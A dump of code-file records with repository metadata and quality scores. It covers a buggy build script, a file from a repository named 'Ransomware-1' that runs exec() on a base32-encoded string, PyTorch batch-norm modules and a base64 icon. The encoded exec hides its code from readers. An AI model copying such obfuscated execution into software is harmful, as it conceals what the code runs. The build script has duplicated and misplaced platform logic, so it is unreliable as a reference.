Each record below is one source file: repository metadata, the file content, and per-file quality signals. In each record, the trailing numeric values are listed in this column order. Schema (column | type):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path, max_stars_repo_name, max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime, max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path, max_issues_repo_name, max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime, max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path, max_forks_repo_name, max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime, max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal, qsc_code_mean_word_length_quality_signal, qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal, qsc_code_frac_chars_top_3grams_quality_signal, qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal through qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal, qsc_code_frac_chars_digital_quality_signal, qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal, qsc_code_num_lines_quality_signal, qsc_code_num_chars_line_max_quality_signal, qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal, qsc_code_frac_chars_comments_quality_signal, qsc_code_cate_xml_start_quality_signal, qsc_code_frac_lines_dupe_lines_quality_signal, qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal, qsc_code_frac_chars_string_length_quality_signal, qsc_code_frac_chars_long_word_length_quality_signal, qsc_code_frac_lines_string_concat_quality_signal, qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal, qsc_code_frac_lines_prompt_comments_quality_signal, qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal, qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal, qsc_codepython_frac_lines_import_quality_signal, qsc_codepython_frac_lines_simplefunc_quality_signal, qsc_codepython_score_lines_no_logic_quality_signal, qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words through qsc_codepython_frac_lines_print (the same 41 signal names without the _quality_signal suffix) | int64, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null) |
| effective | string |
| hits | int64 |
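
One way to consume a dump with this schema (a minimal sketch, not part of the dataset itself: the file name, the thresholds, and the choice of pandas are illustrative assumptions) is to load it into a DataFrame and filter on a few of the quality signals:

```python
# Minimal sketch: load a dump that follows the schema above and keep rows
# that pass a few illustrative quality-signal filters. "code_sample.parquet"
# is a placeholder file name, not a real artifact of this dataset.
import pandas as pd

df = pd.read_parquet("code_sample.parquet")

mask = (
    (df["lang"] == "Python")
    # Category flags: in the preview rows below, 1 appears to mark flagged
    # files (e.g. auto-generated or encoded-data blobs); this is an assumption.
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)
    & (df["qsc_code_cate_encoded_data_quality_signal"] == 0)
    # Fraction of alphanumeric characters; 0.6 is an arbitrary cutoff.
    & (df["alphanum_fraction"] > 0.6)
)
filtered = df[mask]

# Inspect one surviving record: repository, aggregate hit count, and content.
row = filtered.iloc[0]
print(row["max_stars_repo_name"], row["hits"])
print(row["content"][:200])
```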

hexsha: 373a4986c3029623b7ac46089c460814dba599fc | size: 19,249 | ext: py | lang: Python
max_stars: unlock/bci/acquire-c++/build.py in NeuralProsthesisLab/unlock (head 0c4d95abdab288d3e657ca2db867b06f755f26ff), licenses ["BSD-3-Clause"], max_stars_count 6, stars events 2017-05-05T01:08:55.000Z to 2021-08-03T21:50:07.000Z
max_issues: same path, repo, and head, licenses ["BSD-3-Clause"], max_issues_count 1, issues events 2015-05-21T01:02:50.000Z to 2015-05-21T16:03:43.000Z
max_forks: same path, repo, and head, licenses ["BSD-3-Clause"], max_forks_count 4, forks events 2015-05-21T12:38:42.000Z to 2022-03-28T15:47:58.000Z
content:
# Copyright (c) James Percent and Unlock contributors.
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Unlock nor the names of its contributors may be used
# to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from optparse import OptionParser
import subprocess
import logging
import inspect
import sys
import os
class Builder(object):
def __init__(self, platform):
super(Builder, self).__init__()
self.platform = str(platform).casefold()
def build(self):
ret = {
'win32'.casefold(): builder.build_windows,
'darwin'.casefold(): builder.build_darwin,
'linux'.casefold(): builder.build_linux
}.get(self.platform, builder.unsupported)()
return ret
def build_windows(self):
conf = None
logger = None
loglevel = logging.INFO
args = None
options = None
parser = None
usage = "usage: %prog [options]"
python = 'python.exe'
scons = 'scons-2.3.0.py'
lib_dir = os.path.join('lib', 'mac-x86-64-g++-10')
runtime_dir = os.path.join('..', 'acquire')
cwd = os.getcwd()
runtime_dir_help = 'sets the installation directory; defaults to ..\acquire'
lib_dir_help = 'sets the library directory to copy binaries to; default is lib\win-x86-msvc-10, relative the build directory'
clean_help = 'removes old binaries before building'
python_help = 'specifies the location of the python interpreter; default is c:\Python27\python.exe'
scons_help = 'specifies the location of the scons script; default is c:\Python27\Scripts\scons-2.3.0.py'
setup_help = 'configures the build environment for the first time; must be run with the first build'
build_help = 'builds the libraries and tests and copies them to the library directory'
parser = OptionParser(version="%prog 1.0", usage=usage)
parser.add_option('-n', '--runtime-dir', dest='runtime_dir', action='store_true', default=False,
metavar='RUNTIME_DIR', help=runtime_dir_help)
parser.add_option('-p', '--python', dest='python', action='store_true', default=False, metavar='PYTHON',
help=python_help)
parser.add_option('-o', '--scons', dest='scons', action='store_true', default=False, metavar='SCONS',
help=scons_help)
parser.add_option('-l', '--lib-dir', dest='lib_dir', action='store_true', default=False, metavar='LIB_DIR',
help=lib_dir_help)
parser.add_option('-c', '--clean', dest='clean', action='store_true', default=False, metavar='CLEAN',
help=clean_help)
parser.add_option('-s', '--setup', dest='setup', action='store_true', default=False, metavar='SETUP',
help=setup_help)
parser.add_option('-i', '--install', dest='install', action='store_true', default=False, metavar='install',
help=setup_help)
parser.add_option('-b', '--build', dest='build', action='store_true', default=False, metavar='build',
help=build_help)
(options, args) = parser.parse_args()
redirect = {'stdin': sys.stdin, 'stdout': sys.stdout, 'stderr': sys.stderr}
if options.setup:
install_includes = ['tar', 'xzvf', 'includes.tar.gz']
subprocess.check_call(install_includes, **redirect)
install_python27 = ['cmd', '/C install-python27.bat']
subprocess.check_call(install_python27, **redirect)
os.chdir(os.path.join('..', '..', '..', 'package'))
untar_scons = ['tar', 'zxvf', 'scons-2.3.0.tar.gz']
subprocess.check_call(untar_scons, **redirect)
os.chdir('scons-2.3.0')
install_scons230 = ['C:\Python27\python.exe', 'setup.py', 'install']
subprocess.check_call(install_scons230, **redirect)
os.chdir(cwd)
if options.python:
python = options.python
if options.scons:
scons = options.scons
if options.clean:
subprocess.check_call([python, scons, '-c'], **redirect)
if options.lib_dir:
lib_dir = options.lib_dir
if options.build:
# XXX - For fsck(2) sake fix me; this stuff is specified in serveral places. We should generate the
# SConstruct file from this file.
subprocess.check_call([python, scons, '-Q'], **redirect)
ns_dll = 'neuralsignal_win_x86.dll'
ns_test_dll = 'neuralsignal-unit-tests.exe'
random_dll = 'random_signal_win_x86.dll'
random_test_dll = 'random-unit-tests.exe'
mobilab_dll = 'mobilab_signal_win_x86.dll'
mobilab_test_dll = 'mobilab-unit-tests.exe'
enobio_dll = 'enobio_signal_win_x86.dll'
enobio_test_dll = 'enobio-unit-tests.exe'
nidaq_dll = 'nidaq_signal_win_x86.dll'
nidaq_test_dll = 'nidaq-unit-tests.exe'
ns = os.path.join(cwd, ns_dll)
ns_dest = os.path.join(cwd, lib_dir, ns_dll)
ns_dest_python = os.path.join(cwd, lib_dir, 'neuralsignal.pyd')
ns_test = os.path.join(cwd, ns_test_dll)
ns_test_dest = os.path.join(cwd, lib_dir, ns_test_dll)
random = os.path.join(cwd, random_dll)
random_dest = os.path.join(cwd, lib_dir, random_dll)
random_dest_python = os.path.join(cwd, lib_dir, 'random_signal.pyd')
random_test = os.path.join(cwd, random_test_dll)
random_test_dest = os.path.join(cwd, lib_dir, random_test_dll)
mobilab = os.path.join(cwd, mobilab_dll)
mobilab_dest = os.path.join(cwd, lib_dir, mobilab_dll)
mobilab_dest_python = os.path.join(cwd, lib_dir, 'mobilab_signal.pyd')
mobilab_test = os.path.join(cwd, mobilab_test_dll)
mobilab_test_dest = os.path.join(cwd, lib_dir, mobilab_test_dll)
enobio = os.path.join(cwd, enobio_dll)
enobio_dest = os.path.join(cwd, lib_dir, enobio_dll)
enobio_dest_python = os.path.join(cwd, lib_dir, 'enobio_signal.pyd')
enobio_test = os.path.join(cwd, enobio_test_dll)
enobio_test_dest = os.path.join(cwd, lib_dir, enobio_test_dll)
nidaq = os.path.join(cwd, nidaq_dll)
nidaq_dest = os.path.join(cwd, lib_dir, nidaq_dll)
nidaq_dest_python = os.path.join(cwd, lib_dir, 'nidaq_signal.pyd')
nidaq_test = os.path.join(cwd, nidaq_test_dll)
nidaq_test_dest = os.path.join(cwd, lib_dir, nidaq_test_dll)
copy_ns = ['cp', ns, ns_dest]
copy_ns_python = ['cp', ns, ns_dest_python]
copy_ns_test = ['cp', ns_test, ns_test_dest]
copy_random = ['cp', random, random_dest]
copy_random_python = ['cp', random, random_dest_python]
copy_random_test = ['cp', random_test, random_test_dest]
copy_mobilab = ['cp', mobilab, mobilab_dest]
copy_mobilab_python = ['cp', mobilab, mobilab_dest_python]
copy_mobilab_test = ['cp', mobilab_test, mobilab_test_dest]
copy_enobio = ['cp', enobio, enobio_dest]
copy_enobio_python = ['cp', enobio, enobio_dest_python]
copy_enobio_test = ['cp', enobio_test, enobio_test_dest]
copy_nidaq = ['cp', nidaq, nidaq_dest]
copy_nidaq_python = ['cp', nidaq, nidaq_dest_python]
copy_nidaq_test = ['cp', nidaq_test, nidaq_test_dest]
# execute the commands
subprocess.check_call(copy_ns, **redirect)
subprocess.check_call(copy_enobio_python, **redirect)
subprocess.check_call(copy_ns_test, **redirect)
subprocess.check_call(copy_random, **redirect)
subprocess.check_call(copy_random_python, **redirect)
subprocess.check_call(copy_random_test, **redirect)
subprocess.check_call(copy_enobio, **redirect)
subprocess.check_call(copy_enobio_python, **redirect)
subprocess.check_call(copy_enobio_test, **redirect)
subprocess.check_call(copy_mobilab, **redirect)
subprocess.check_call(copy_mobilab_python, **redirect)
subprocess.check_call(copy_mobilab_test, **redirect)
subprocess.check_call(copy_nidaq, **redirect)
subprocess.check_call(copy_nidaq_python, **redirect)
subprocess.check_call(copy_nidaq_test, **redirect)
if options.runtime_dir:
runtime_dir = options.runtime_dir
if options.install:
def install_file(file_name):
libs = os.path.join(cwd, lib_dir, file_name)
dest = os.path.join(cwd, runtime_dir, file_name)
install_command = ['cp', libs, dest]
subprocess.check_call(install_command, **redirect)
for root, dirs, files in os.walk(os.path.join(cwd, lib_dir), topdown=False):
for file in files:
if file.endswith('dll') or file.endswith('exe') or file.endswith('pyd'):
install_file(file)
def unsupported(self):
raise RuntimeError('Unsupported OS '+ self.platform)
def build_linux(self):
return self.unsupported()
def build_darwin(self):
conf = None
logger = None
loglevel = logging.INFO
args = None
options = None
parser = None
usage = "usage: %prog [options]"
python = 'C:\Python27\python.exe'
scons = 'C:\Python27\Scripts\scons-2.3.0.py'
lib_dir = os.path.join('lib', 'win-x86-msvc-10')
runtime_dir = os.path.join('..', 'acquire')
cwd = os.getcwd()
runtime_dir_help = 'sets the installation directory; defaults to ..\acquire'
lib_dir_help = 'sets the library directory to copy binaries to; default is lib\win-x86-msvc-10, relative the build directory'
clean_help = 'removes old binaries before building'
python_help = 'specifies the location of the python interpreter; default is c:\Python27\python.exe'
scons_help = 'specifies the location of the scons script; default is c:\Python27\Scripts\scons-2.3.0.py'
setup_help = 'configures the build environment for the first time; must be run with the first build'
build_help = 'builds the libraries and tests and copies them to the library directory'
parser = OptionParser(version="%prog 1.0", usage=usage)
parser.add_option('-n', '--runtime-dir', dest='runtime_dir', action='store_true', default=False,
metavar='RUNTIME_DIR', help=runtime_dir_help)
parser.add_option('-p', '--python', dest='python', action='store_true', default=False, metavar='PYTHON',
help=python_help)
parser.add_option('-o', '--scons', dest='scons', action='store_true', default=False, metavar='SCONS',
help=scons_help)
parser.add_option('-l', '--lib-dir', dest='lib_dir', action='store_true', default=False, metavar='LIB_DIR',
help=lib_dir_help)
parser.add_option('-c', '--clean', dest='clean', action='store_true', default=False, metavar='CLEAN',
help=clean_help)
parser.add_option('-s', '--setup', dest='setup', action='store_true', default=False, metavar='SETUP',
help=setup_help)
parser.add_option('-i', '--install', dest='install', action='store_true', default=False, metavar='install',
help=setup_help)
parser.add_option('-b', '--build', dest='build', action='store_true', default=False, metavar='build',
help=build_help)
(options, args) = parser.parse_args()
redirect = {'stdin': sys.stdin, 'stdout': sys.stdout, 'stderr': sys.stderr}
if options.setup:
install_includes = ['tar', 'xzvf', 'includes.tar.gz']
subprocess.check_call(install_includes, **redirect)
install_python27 = ['cmd', '/C install-python27.bat']
subprocess.check_call(install_python27, **redirect)
os.chdir(os.path.join('..', '..', '..', 'package'))
untar_scons = ['tar', 'zxvf', 'scons-2.3.0.tar.gz']
subprocess.check_call(untar_scons, **redirect)
os.chdir('scons-2.3.0')
install_scons230 = ['C:\Python27\python.exe', 'setup.py', 'install']
subprocess.check_call(install_scons230, **redirect)
os.chdir(cwd)
if options.python:
python = options.python
if options.scons:
scons = options.scons
if options.clean:
subprocess.check_call([python, scons, '-c'], **redirect)
if options.lib_dir:
lib_dir = options.lib_dir
if options.build:
# XXX - For fsck(2) sake fix me; this stuff is specified in serveral places. We should generate the
# SConstruct file from this file.
subprocess.check_call([python, scons, '-Q'], **redirect)
ns_dll = 'neuralsignal_win_x86.dll'
ns_test_dll = 'neuralsignal-unit-tests.exe'
random_dll = 'random_signal_win_x86.dll'
random_test_dll = 'random-unit-tests.exe'
mobilab_dll = 'mobilab_signal_win_x86.dll'
mobilab_test_dll = 'mobilab-unit-tests.exe'
enobio_dll = 'enobio_signal_win_x86.dll'
enobio_test_dll = 'enobio-unit-tests.exe'
nidaq_dll = 'nidaq_signal_win_x86.dll'
nidaq_test_dll = 'nidaq-unit-tests.exe'
ns = os.path.join(cwd, ns_dll)
ns_dest = os.path.join(cwd, lib_dir, ns_dll)
ns_dest_python = os.path.join(cwd, lib_dir, 'neuralsignal.pyd')
ns_test = os.path.join(cwd, ns_test_dll)
ns_test_dest = os.path.join(cwd, lib_dir, ns_test_dll)
random = os.path.join(cwd, random_dll)
random_dest = os.path.join(cwd, lib_dir, random_dll)
random_dest_python = os.path.join(cwd, lib_dir, 'random_signal.pyd')
random_test = os.path.join(cwd, random_test_dll)
random_test_dest = os.path.join(cwd, lib_dir, random_test_dll)
mobilab = os.path.join(cwd, mobilab_dll)
mobilab_dest = os.path.join(cwd, lib_dir, mobilab_dll)
mobilab_dest_python = os.path.join(cwd, lib_dir, 'mobilab_signal.pyd')
mobilab_test = os.path.join(cwd, mobilab_test_dll)
mobilab_test_dest = os.path.join(cwd, lib_dir, mobilab_test_dll)
enobio = os.path.join(cwd, enobio_dll)
enobio_dest = os.path.join(cwd, lib_dir, enobio_dll)
enobio_dest_python = os.path.join(cwd, lib_dir, 'enobio_signal.pyd')
enobio_test = os.path.join(cwd, enobio_test_dll)
enobio_test_dest = os.path.join(cwd, lib_dir, enobio_test_dll)
nidaq = os.path.join(cwd, nidaq_dll)
nidaq_dest = os.path.join(cwd, lib_dir, nidaq_dll)
nidaq_dest_python = os.path.join(cwd, lib_dir, 'nidaq_signal.pyd')
nidaq_test = os.path.join(cwd, nidaq_test_dll)
nidaq_test_dest = os.path.join(cwd, lib_dir, nidaq_test_dll)
copy_ns = ['cp', ns, ns_dest]
copy_ns_python = ['cp', ns, ns_dest_python]
copy_ns_test = ['cp', ns_test, ns_test_dest]
copy_random = ['cp', random, random_dest]
copy_random_python = ['cp', random, random_dest_python]
copy_random_test = ['cp', random_test, random_test_dest]
copy_mobilab = ['cp', mobilab, mobilab_dest]
copy_mobilab_python = ['cp', mobilab, mobilab_dest_python]
copy_mobilab_test = ['cp', mobilab_test, mobilab_test_dest]
copy_enobio = ['cp', enobio, enobio_dest]
copy_enobio_python = ['cp', enobio, enobio_dest_python]
copy_enobio_test = ['cp', enobio_test, enobio_test_dest]
copy_nidaq = ['cp', nidaq, nidaq_dest]
copy_nidaq_python = ['cp', nidaq, nidaq_dest_python]
copy_nidaq_test = ['cp', nidaq_test, nidaq_test_dest]
# execute the commands
subprocess.check_call(copy_ns, **redirect)
subprocess.check_call(copy_enobio_python, **redirect)
subprocess.check_call(copy_ns_test, **redirect)
subprocess.check_call(copy_random, **redirect)
subprocess.check_call(copy_random_python, **redirect)
subprocess.check_call(copy_random_test, **redirect)
subprocess.check_call(copy_enobio, **redirect)
subprocess.check_call(copy_enobio_python, **redirect)
subprocess.check_call(copy_enobio_test, **redirect)
subprocess.check_call(copy_mobilab, **redirect)
subprocess.check_call(copy_mobilab_python, **redirect)
subprocess.check_call(copy_mobilab_test, **redirect)
subprocess.check_call(copy_nidaq, **redirect)
subprocess.check_call(copy_nidaq_python, **redirect)
subprocess.check_call(copy_nidaq_test, **redirect)
if options.runtime_dir:
runtime_dir = options.runtime_dir
if options.install:
def install_file(file_name):
libs = os.path.join(cwd, lib_dir, file_name)
dest = os.path.join(cwd, runtime_dir, file_name)
install_command = ['cp', libs, dest]
subprocess.check_call(install_command, **redirect)
for root, dirs, files in os.walk(os.path.join(cwd, lib_dir), topdown=False):
for file in files:
if file.endswith('dll') or file.endswith('exe') or file.endswith('pyd'):
install_file(file)
return self.unsupported()
if __name__ == '__main__':
builder = Builder(sys.platform)
builder.build()
avg_line_length: 46.160671 | max_line_length: 133 | alphanum_fraction: 0.631617
quality signals (qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal, in schema order): 2,465 | 19,249 | 4.699391 | 0.117647 | 0.032113 | 0.053522 | 0.062845 | 0.863691 | 0.856699 | 0.856699 | 0.856699 | 0.855318 | 0.855318 | 0 | 0.007872 | 0.254247 | 19,249 | 416 | 134 | 46.271635 | 0.799094 | 0.095434 | 0 | 0.89701 | 0 | 0.013289 | 0.164049 | 0.036941 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026578 | false | 0 | 0.019934 | 0.003322 | 0.059801 | 0
unsuffixed qsc_code_* columns (qsc_code_num_words through qsc_codepython_frac_lines_print, in schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7

hexsha: 37acc2ab04dac4d752a95c705ee08c1d0e666f8e | size: 186 | ext: py | lang: Python
max_stars: test.py in ABDELILAH-OUHAJJOU/Ransomware-1 (head 45754768ebafc87ff54158a0a2b3edc03b59d412), licenses ["MIT"], max_stars_count 58, stars events 2020-04-28T17:12:25.000Z to 2022-03-30T18:53:50.000Z
max_issues: same path, repo, and head, licenses ["MIT"], max_issues_count 2, issues events 2020-05-18T14:35:35.000Z to 2022-03-17T09:49:39.000Z
max_forks: same path, repo, and head, licenses ["MIT"], max_forks_count 13, forks events 2020-06-28T16:17:35.000Z to 2022-02-15T08:20:08.000Z
content:
import marshal, base64
exec(base64.b32decode("MZZG63JAO5QXE3TBEBUW24DPOJ2CA4DFNRQW4Z3JBIFHAZLMMFXGO2JIEJYGYZLBONSSA53BNF2CELBXFQZCSIBDMFZGO4Z5FA6HO33SMRZT4LB4ORUW2ZJ6FQ6HIYLCHYUQU==="))
avg_line_length: 62 | max_line_length: 162 | alphanum_fraction: 0.919355
quality signals (qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal, in schema order): 7 | 186 | 24.428571 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164835 | 0.021505 | 186 | 2 | 163 | 93 | 0.774725 | 0 | 0 | 0 | 0 | 0 | 0.731183 | 0.731183 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0
unsuffixed qsc_code_* columns (qsc_code_num_words through qsc_codepython_frac_lines_print, in schema order): 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0
effective: 0 | hits: 8

hexsha: 808421f1f77813f35c36d3c438e545cb6f342521 | size: 2,509 | ext: py | lang: Python
max_stars: dalib/adaptation/idm/models/dsbn.py in neka-nat/Transfer-Learning-Library (head a3b27b0d7562fa90a02e914140b37ab438469e6c), licenses ["MIT"], max_stars_count 1,474, stars events 2020-07-24T02:55:55.000Z to 2022-03-31T12:35:56.000Z
max_issues: same path, repo, and head, licenses ["MIT"], max_issues_count 70, issues events 2020-08-05T10:47:33.000Z to 2022-03-31T03:48:54.000Z
max_forks: same path, repo, and head, licenses ["MIT"], max_forks_count 312, forks events 2020-08-01T11:08:39.000Z to 2022-03-30T06:03:47.000Z
content:
import torch
import torch.nn as nn
class DSBN2d(nn.Module):
def __init__(self, planes):
super(DSBN2d, self).__init__()
self.num_features = planes
self.BN_S = nn.BatchNorm2d(planes)
self.BN_T = nn.BatchNorm2d(planes)
def forward(self, x):
if not self.training:
return self.BN_T(x)
bs = x.size(0)
assert (bs % 2 == 0)
split = torch.split(x, int(bs / 2), 0)
out1 = self.BN_S(split[0].contiguous())
out2 = self.BN_T(split[1].contiguous())
out = torch.cat((out1, out2), 0)
return out
class DSBN1d(nn.Module):
def __init__(self, planes):
super(DSBN1d, self).__init__()
self.num_features = planes
self.BN_S = nn.BatchNorm1d(planes)
self.BN_T = nn.BatchNorm1d(planes)
def forward(self, x):
if not self.training:
return self.BN_T(x)
bs = x.size(0)
assert (bs % 2 == 0)
split = torch.split(x, int(bs / 2), 0)
out1 = self.BN_S(split[0].contiguous())
out2 = self.BN_T(split[1].contiguous())
out = torch.cat((out1, out2), 0)
return out
class DSBN2d_idm(nn.Module):
def __init__(self, planes):
super(DSBN2d_idm, self).__init__()
self.num_features = planes
self.BN_S = nn.BatchNorm2d(planes)
self.BN_T = nn.BatchNorm2d(planes)
self.BN_mix = nn.BatchNorm2d(planes)
def forward(self, x):
if not self.training:
return self.BN_T(x)
bs = x.size(0)
assert (bs % 3 == 0)
split = torch.split(x, int(bs / 3), 0)
out1 = self.BN_S(split[0].contiguous())
out2 = self.BN_T(split[1].contiguous())
out3 = self.BN_mix(split[2].contiguous())
out = torch.cat((out1, out2, out3), 0)
return out
class DSBN1d_idm(nn.Module):
def __init__(self, planes):
super(DSBN1d_idm, self).__init__()
self.num_features = planes
self.BN_S = nn.BatchNorm1d(planes)
self.BN_T = nn.BatchNorm1d(planes)
self.BN_mix = nn.BatchNorm1d(planes)
def forward(self, x):
if not self.training:
return self.BN_T(x)
bs = x.size(0)
assert (bs % 3 == 0)
split = torch.split(x, int(bs / 3), 0)
out1 = self.BN_S(split[0].contiguous())
out2 = self.BN_T(split[1].contiguous())
out3 = self.BN_mix(split[2].contiguous())
out = torch.cat((out1, out2, out3), 0)
return out
avg_line_length: 28.83908 | max_line_length: 49 | alphanum_fraction: 0.565165
quality signals (qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal, in schema order): 355 | 2,509 | 3.814085 | 0.121127 | 0.106352 | 0.062038 | 0.044313 | 0.966765 | 0.940916 | 0.940916 | 0.940916 | 0.830133 | 0.830133 | 0 | 0.040793 | 0.296532 | 2,509 | 86 | 50 | 29.174419 | 0.726346 | 0 | 0 | 0.828571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 1 | 0.114286 | false | 0 | 0.028571 | 0 | 0.314286 | 0
unsuffixed qsc_code_* columns (qsc_code_num_words through qsc_codepython_frac_lines_print, in schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7

hexsha: 80d77cde655ebcf42d65132957d6b6a04abbd5d6 | size: 2,859 | ext: py | lang: Python
max_stars: b64.py in waterpepene/Window-Wizard (head efc2c5624d29da1f687dac5b6412daa1e463f4fc), licenses ["MIT"], max_stars_count 2, stars events 2020-08-19T18:59:27.000Z to 2021-01-29T09:25:25.000Z
max_issues: same path, repo, and head, licenses ["MIT"], max_issues_count null, issues events null
max_forks: same path, repo, and head, licenses ["MIT"], max_forks_count null, forks events null
content:
quiticon = b'iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAAGXcA1uAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAALtSURBVDhPrZU/TFNRFMZbKCGv9RmMBUw0LnVwchCY3AyaSNQYXIyaGHR0F00cXXQzcXCBGOLAAg7GP4NuooMJRicHGBBNoZg2bdpS6R/9fZf7XtrXlhLDl3zv3HvOPefee+5594ZD4C+Q7NIHnLVyG9VqtRT2htRqtY/qLNJ+hKwYn3A4PItlVG1Fk9WHXL3I6nyXQlDfNxDiODQwCqYdswPr0dsFLtuBBow9A936Oa7AOVY0QzctxZQ1+Ein0zO+QVC7WCzeQ8b8UAJT3HIc5zNNx0vXVLlcPtfT03Nf/SCIcjIajd6m2W8UcoANWRFKpdLdfD7/Ctswi80i48ZQ74D0MxZAgVUMNazV4hf8YZmRQsDhRSQS+ep1Wi5pbW0tAUewjUIh7m8a3iAbfsR6YOvF5tLsNx3ObwG5I3TGclZFaecbhULhSSwW+yJlEGz2ASl/o/PQDHETgnVaexOwLUJzwq2yZMAAN5vNruZyuUss55tVG4M/A+yDqipxAmrtZcQ08lArh4vbzWZsbW3NIbraLikINn0hlUo5QYc89E75pxQWOaKfGhwcLLTNEn2jp1I/kdbrFN9EgwEEHbqXl5e1eQd2TiuHVE0kErPITasy8B2IMA832vCEHRbyik/l8RDepF1FFon8R7bdAr9eRBS/buQ0nKT9WzZv36pwQftrW1btIB/rKyiW+Zt3fc71wLk7mUweW1paumr/R8eaWkOz2VmFjjvA7o+nhEsqBV1/KodKpfJUJYEpZoe3nwB5Gr6HKwGuwjQMIkvw51C7iihGpxTtg4fh0QCPwAMwiP0c7DW4kMlkptfX1xsv9D1CkVS9dF338cDAwGZTmULdYndYxTv0fbRH4EFYDx3qeTiuDimpIDZ44d7i8xp+oJ0iRk32/zlkl0dmksttRQ+NLjl0wxzwMybTg+OXqYE6Vins6X/QlCLyl4TzvJVN79BOoEyHuBPHoW7epj9ZT88Y7Pj8dIJiKBZNro5Q6B9OlJ1IG1ZlsAAAAABJRU5ErkJggg=='
